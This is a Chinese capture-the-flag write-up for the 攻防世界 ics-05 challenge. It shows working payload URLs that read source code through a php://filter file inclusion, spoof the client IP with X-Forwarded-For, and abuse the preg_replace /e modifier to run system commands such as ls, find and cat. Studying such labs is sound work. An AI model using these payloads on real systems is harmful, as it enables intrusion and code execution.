攻防世界 ics-05

ctrl+U打开源码看了一下只有这个的a标签href有东西，其他全是空的

点了一下字体出来一个page参数，但还是没法做题

dirsearch扫一下

/index.php/login/也是点击字体后出现一个page参数，index.php可能把源码隐藏了，我们使用伪协议读取试试

payload：

http://61.147.171.105:54957/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

将这串base64码解码后找到PHP重要内容为，preg_replace($pattern, $replacement, $subject)函数的作用是在$subject中搜索符合$pattern的部分，并用$replacement替换找到的部分

这里没做任何保护措施，可以利用preg_replace函数的/e模式任意代码执行。在preg_replace($pattern, $replacement, $subject)中将前面拼接一个/e，$replacement传值为要执行的命令即可。

利用XFF使ip为127.0.0.1，然后传递采纳数构造payload

http://61.147.171.105:54957/index.php?pat=/a/e&rep=system('ls')&sub=a

发现了一下文件夹

懒得找直接find开搜，payload：

http://61.147.171.105:54957/index.php?pat=/a/e&rep=system('find / -name flag.php')&sub=a

发现路径，是刚才那个文件夹下的，可以直接列出那个文件夹下的文件，比find快

直接查看flag.php吧，因为网站处于/var/www/html下，我们直接构造

payload:

view-source:http://61.147.171.105:54957/index.php?pat=/a/e&rep=system(%27cat%20s3chahahaDir/flag/flag.php%20%20%27)&sub=a